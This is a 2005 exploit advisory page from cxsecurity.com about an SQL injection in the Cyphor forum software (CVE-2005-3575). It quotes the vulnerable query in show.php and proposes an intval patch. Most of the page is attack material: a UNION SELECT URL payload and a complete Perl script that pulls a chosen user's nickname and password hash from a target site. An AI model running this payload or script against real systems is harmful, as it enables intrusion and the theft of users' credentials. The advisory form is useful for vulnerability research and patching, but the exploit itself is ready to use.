Bug: Cyphor (Release: 0.19) Sql injection (WLB-2005110041 Ascii Version)

	WLB2
Full List

Bugs

Bogus

Tricks

Exploits

	CVE MAP
Full List

Vendors

Products

	Tools
CWE Dictionary

Google Hacking

	Search
General

CVE

CWE

	RSS
Full List

Bugs

Exploits

Dorks

	Information
Our services

Add note

About



	Submit
To add a note, use this form or send email to submit@cxsecurity.com When contacting via email, we recommend coded messages. Get our PGP public key

Topic:	Cyphor (Release: 0.19) Sql injection
Credit:	HACKERS PAL
Date:	2005.11.15
CWE:	N/A
CVE:	CVE-2005-3575 (Show details) Use CVE to see details like: - CVSS2, - Affected Software, - References

Risk	Local		Remote
Medium	No		Yes

Hello

This is sql injection in cyphor

Discovered by : HACKERS PAL

Greets For Devil-00 - Abducter - Almaster
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
injected vresions :-
Cyphor (Release: 0.19) and all Versions Up To now
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
injected File
show.php
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
injection code :-
show.php?fid=2&id=-10%20union%20select%20id,null,null,null,null,nick,password,null,null,null%20from%20users%20where%
20id=1
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Discovering the vul :-
searching in show.php file in line 59 to 62 as below

[/code]
if ($id) {
// a message with id=$id will be displayed
$message_mode = 1;
$query = "SELECT * FROM $db_table_name WHERE id=$id";
[/code]

The Programmed Didont Check The $id Variable .. if it was integer
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
How to protect :-

after
$message_mode = 1;

add
// Script Protection By : HACKERS PAL
$id=intval($id);
if(!$id)
{
die("<br>We Dont allow Skript Kidz .. <br> By <a hre='Http://www.sqor.net'>HACKERS
PAL</a>");
}
// !/script Porotection By : HACKERS PAL fINISHED
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
exploit :-

#!/bin/env perl

#//-----------------------------------------------------------#

#// Cyphor Forum SQL Injection Exploit .. By HACKERS PAL

#// Greets For Devil-00 - Abducter - Almaster

#// http://WwW.SoQoR.NeT

#//-----------------------------------------------------------#

use LWP::Simple;

print "\n#####################################################";

print "\n# Cyphor Forum Exploit By : HACKERS PAL #";

print "\n# Http://WwW.SoQoR.NeT #";

if(!$ARGV[0]||!$ARGV[1]) {

print "\n# -- Usage: #";

print "\n# -- perl $0 [Full-Path] 1 #";

print "\n# -- Example: #";

print "\n# -- perl $0 http://www.cynox.ch/cyphor/forum/ 1#";

print "\n# Greets To Devil-00 - Abducter - almastar #";

print "\n#####################################################\n";

exit(0);

}

else

{

print "\n# Greets To Devil-00 - Abducter - almastar #";

print "\n#####################################################\n";

$web=$ARGV[0];
$id=$ARGV[1];

$url =
"show.php?fid=2&id=-10%20union%20select%20id,2,3,4,5,nick,password,8,id,10%20from%20users%20where%20id=$id"
;;

$site="$web/$url";

$page = get($site) || die "[-] Unable to retrieve: $!";

print "\n[+] Connected to: $ARGV[0]\n";

print "[+] User ID is : $id ";

$page =~ m/<span class=bigh>(.*?)<\/span>/ && print "\n[+] User Name is: $1\n";

print "\n[-] Unable to retrieve User Name\n" if(!$1);

$page =~ m/<span class=message>(.*?)<\/span>/ && print "[+] Hash of password is: $1\n";

print "[-] Unable to retrieve hash of password\n" if(!$1);

}

print "\n\nGreets From HACKERS PAL To you :)\nWwW.SoQoR.NeT . . . You Are Welcome\n\n";

#finished

[ ASCII VERSION ]

Bug: Cyphor (Release: 0.19) Sql injection (WLB-2005110041 Ascii Version)

use this form